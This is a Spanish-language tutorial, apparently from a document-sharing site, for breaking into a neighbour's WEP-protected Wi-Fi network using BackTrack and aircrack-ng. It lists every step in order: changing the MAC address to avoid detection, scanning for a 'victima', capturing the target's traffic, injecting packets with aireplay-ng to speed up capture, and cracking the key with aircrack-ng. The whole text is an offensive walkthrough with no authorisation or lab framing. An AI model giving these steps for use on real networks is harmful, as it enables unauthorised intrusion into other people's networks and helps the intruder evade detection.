You are on page 1of 2

Tutorial backtrack 3 y cuatro

Primero:
Abrir una consola sheel
Colocar
Iwconfig
Aparecer esto

Ajora paramos el trafico de paquetes en nuestro pc con el comando
Airmon-ng stop wlan0

Ahora bajamos la sean a nuestro ordenador con
Ifconfig wlan0 down

Ahora cambiamos nuestra MAC para no ser detectados con este comando
Macchanger - - mac 00:11:22:33:44:55 wlan0

Ahora que cambiamos la MAC de nuestra tarjeta de red activamos la red que habamos
desactivado con este comando
Airmon-ng start wlan0

Ver cual es nuestra configuracin, desactivar nuestro acceso a la red, cambiar nuestro numero
MAC, y luego activar nuestro acceso
Ahora vamos a monitorear la red para buscar a alguna victima
Con el siguiente comando


Airodump-ng wlan0

Una vez que detectamos a alguna victima vamos a capturarle los paquetes de su trafico de red es
necesario para sacar de estos paquetes la clave y esto se hace con el siguiente comando
Airodump-ng -c (x) -w tacperu --bssid (mac de la victima) wlan0
Comienza la captura de paquetes de la redm ojo si no inyectamos paquetes tendramos que dejar
toda la noche hasta que tengamos los paquetes suficientes, pero hay solucin ahora vamos a
inyectar paquetes para que el proceso sea mas rpido con el siguiente comandoen una nueva Shell

Aireplay-ng -1 0 -a (mac de la victima) -h (nuestra mac que ahora es 00:11:22:33:44:55) -e
(nombre de la red ssid) wlan0

Luego en otra Shell
Aireplay-ng -3 -b (mac de la vistima) -h 00:11:22:33:44:55 wlan0

Ahora una vez que tengamos los paquetes (ivs) suficientes rompemos la clave , primero peuab con
a10000 paquetes si no rompe junta mas y deja al sistema que te diga cuantos necesita y esperas
unos minutos y vuelve a aplicar el comando , de cual comando hablamos, pues de este

Aircrack-ng -n64 *.cap

Y esperas hasta que te salga la clave

You might also like